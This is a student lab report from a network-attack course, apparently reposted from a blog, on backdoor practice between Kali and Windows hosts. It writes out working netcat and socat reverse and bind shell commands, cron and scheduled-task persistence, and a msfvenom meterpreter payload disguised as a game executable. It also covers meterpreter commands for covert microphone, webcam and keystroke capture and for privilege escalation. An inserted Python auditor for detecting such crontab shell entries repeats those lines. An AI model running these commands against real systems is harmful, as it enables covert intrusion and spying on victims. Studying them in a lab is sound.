2019-2020-2 20175321 Wuding Cheng, "Network Confrontation Technology" Exp2: Backdoor Principles and Practice


I. Practice objectives

  • Task 1: Use netcat to get a shell on the host and start it via cron
  • Task 2: Use socat to get a shell on the host and start it via a scheduled task
  • Task 3: Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it, and obtain a shell on the host
  • Task 4: Use MSF meterpreter (or other software) to obtain audio, camera images and keystrokes from the target host, and attempt privilege escalation

II. Basics

  • Backdoor: a way of accessing a system that bypasses the normal authentication process
  • May exist in:
    • compiler
    • operating system
    • firmware
    • application
  • Backdoor workflow: implant → run → evade anti-virus detection.
  • Backdoor tools:
    • Netcat: a low-level tool for basic TCP/UDP data sending and receiving. It is usually combined with other tools and can then act as a backdoor.
    • socat: an enhanced version of nc. Its basic function is to create two bidirectional byte streams and transfer data between them; each address parameter represents one direction. A "stream" is a flow of data, and the data can be of many different types, so the command takes a number of options to define and describe the corresponding types of data stream.
    • Meterpreter: has powerful features, especially its socks proxy. Meterpreter is the killer feature of the Metasploit framework. It is usually used as the payload after an overflow vulnerability is exploited: once the vulnerability is triggered, the payload returns a control channel to us. For example, when exploiting a remote procedure call (RPC) service vulnerability, we choose Meterpreter as the payload, and once the vulnerability is triggered we obtain a Meterpreter shell connected to the target system. Meterpreter is an extension module of the Metasploit framework that can call some of Metasploit's features to penetrate the target system more deeply; these features include anti-tracing, memory-only operation, password hash acquisition, privilege escalation and using the host as a springboard (pivot) for further attacks.

III. Experiment content

1. Use netcat to get a shell on the host and start it via cron

1.1 Getting a Linux shell from Windows

First run ipconfig on Windows to see its IP address.

After turning off the firewall, use ncat.exe to start listening:
ncat.exe -l -p 5321

On Kali, use the -e option to make a reverse connection to Windows and run a shell:
nc 192.168.1.18 5321 -e /bin/sh

Windows then gets Kali's shell:

1.2 Getting a Windows shell from Linux

On Kali, run ifconfig to view Kali's IP:

On Kali, start listening:
nc -l -p 5321

On Windows, make a reverse connection to Kali:
ncat.exe -e cmd.exe 192.168.1.20 5321

Kali successfully gets a Windows command prompt:

1.3 Starting via cron

Cron is the scheduled-task service on Linux. It runs every minute and executes the preset commands according to its configuration file.

With Windows listening on port 5321, enter crontab -e on the Linux system and select 3 to enter edit mode.

Add 21 * * * * /bin/netcat 192.168.1.18 5321 -e /bin/sh on the last line, which means the command is executed at minute 21 of every hour.

Linux connects to Windows at minute 21; once the Windows listener accepts the connection, the shell is available:
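From the defender's side, the crontab entry above (and the socat exec: form used in section 2) is exactly what a persistence audit should flag. The following Python script is an added example, not part of the original report: it reads crontab lines, finds commands that hand a shell to nc/ncat/netcat/socat, and explains the schedule of each hit. The sample crontab is constructed for the example.

```python
from os.path import basename
# Tools and shells whose combination in one command matches section 1.3 (netcat ... -e /bin/sh) or socat's exec: form.
NET_TOOLS = {"nc", "ncat", "netcat", "socat", "ncat.exe", "socat.exe"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # nc/ncat "run this program" switches

def is_shell_binding(cmd):
    # Return (tool, reason) if cmd hands a shell to a network tool, else None.
    tokens = cmd.split()
    tool = next((basename(t) for t in tokens if basename(t) in NET_TOOLS), None)
    if tool is None:
        return None
    for i, t in enumerate(tokens):
        if t in EXEC_FLAGS and i + 1 < len(tokens) and basename(tokens[i + 1]) in SHELLS:
            return tool, f"{t} {tokens[i + 1]} hands a shell to {tool}"
        if t.startswith(("exec:", "system:")):   # socat address, e.g. exec:/bin/bash,pty
            prog = t.split(":", 1)[1].split(",", 1)[0]
            if basename(prog) in SHELLS:
                return tool, f"{t} spawns a shell for {tool}"
    return None

def describe_schedule(minute, hour):
    # Plain-language reading of the first two crontab fields (common cases only).
    if minute.isdigit() and hour == "*":
        return f"minute {minute} of every hour"
    if minute.startswith("*/") and hour == "*":
        return f"every {minute[2:]} minutes"
    return f"minute={minute} hour={hour}"

def audit_crontab(text):
    # One finding per crontab line that schedules a network-bound shell.
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        fields = line.split(None, 5)
        if not line or line.startswith("#") or len(fields) < 6:
            continue                  # blank lines, comments, VAR=value assignments
        minute, hour, _dom, _mon, _dow, cmd = fields
        hit = is_shell_binding(cmd)
        if hit:
            findings.append({"line": line, "tool": hit[0], "reason": hit[1],
                             "schedule": describe_schedule(minute, hour)})
    return findings

# Constructed sample crontab (not from a real host): a benign job, the section 1.3 entry,
# a socat equivalent, and a harmless nc port check that must not match.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/apt-get update
21 * * * * /bin/netcat 192.168.1.18 5321 -e /bin/sh
*/5 * * * * /usr/bin/socat tcp:192.168.1.18:5321 exec:/bin/bash,pty,stderr
30 2 * * 0 /usr/bin/nc -z localhost 22
"""
```

Run audit_crontab on the output of crontab -l (and on /etc/cron.d files) to list such entries; is_shell_binding also recognises the Windows command strings from sections 1.2 and 2.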

1.4 Data transmission with nc

On Windows, use ncat.exe -l 5321 to listen on port 5321; on Kali, use nc 192.168.1.18 5321 to connect to port 5321 on Windows. Once the connection is established, the two sides can transfer data to each other.

2. Use socat to get a shell on the host and start it via a scheduled task

After downloading socat, open Computer Management - Task Scheduler - Create Task, fill in the task name and create a new trigger.

Under "Program/script", choose the path of your socat.exe file, and in the "Add arguments" field enter tcp-listen:5321 exec:cmd.exe,pty,stderr. This binds cmd.exe to port 5321 and redirects cmd.exe's stderr to stdout.

Then create a trigger and set its time; leave the other settings at their defaults.

You can see that the task has been created and is ready.

When the trigger time is reached, the task runs automatically.

On Kali, enter socat - tcp:192.168.0.102:5321 to connect to port 5321 on the Windows host, and you get the Windows shell:

3. Use MSF meterpreter to generate an executable, transfer it to the host with ncat or socat, run it and obtain a shell on the host

Use Kali to attack Win10. First run the following on Kali (the IP address here is Kali's IP):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 -f exe > Counter-Strike20175321.exe

On Windows, run ncat.exe -lv 5321 > Counter-Strike20175321.exe and view the current connection status.

On Kali, use nc 192.168.1.18 5321 < Counter-Strike20175321.exe to transfer the backdoor; when the transfer succeeds, the transfer information appears in the cmd window on Win10.

On Kali, run msfconsole to enter the msf console, then type:

use exploit/multi/handler    // use the listener module and set the payload
set payload windows/meterpreter/reverse_tcp    // use the same payload as when the backdoor was generated
set LHOST 192.168.1.20    // Kali's IP
set LPORT 5321    // use the same port

Run exploit to start listening, then run the backdoor program in cmd on Windows; a shell on the Windows host is obtained on Kali.

4. Use MSF meterpreter to obtain audio, camera images and keystrokes from the target host, and try privilege escalation

4.1 Enter record_mic to capture a period of audio; when the recording finishes, the file is saved automatically and the output path is shown:

4.2 Enter webcam_snap to take a photo with the camera; when done, the image is saved automatically, the output path is shown and the image is opened automatically.

4.3 Enter keyscan_start and then keyscan_dump to capture and dump the target's keystrokes:

4.4 Enter screenshot to take a screenshot.

4.5 Enter getsystem to attempt privilege escalation:

IV. Problems encountered in the experiment

1. File transfer with nc was not successful

Cause: unknown

Solution: none

2. cron did not start on time

Cause: the task's Conditions tab had "Start the task only if the computer is on AC power" and "Stop if the computer switches to battery power" checked by default.

Solution: plug in the power or uncheck these options.

3. "This application cannot run on your computer"

Cause: the backdoor file transfer failed.

Solution: transfer it again.

V. Experiment summary and experience

1. Answers to basic questions

  • (1) Give examples of ways you can think of that a backdoor could enter your system.
    • Software obtained from non-official websites
  • (2) Give examples of ways a backdoor can start up (Windows and Linux).
    • Timer start (for example cron), start on boot/restart, start when a program is run.
  • (3) Which Meterpreter function left the deepest impression on you?
    • Accessing the camera of the attacked machine to steal images and audio without the user being aware.
  • (4) How can you find out whether a backdoor has been installed on your own system?
    • Turn on the firewall and antivirus software and don't give the program a chance.

2. Experimental experience

I thought this experiment would not take so much time, but because it involves different systems (machines) monitoring each other and transferring data and files, all kinds of unexpected situations often occurred. Not only did we need patience to analyze and solve problems one after another, but also the courage to redo things, the courage to understand their nature, and a pair of sharp "eyes". It really trains a person.


Origin www.cnblogs.com/Brass/p/12549935.html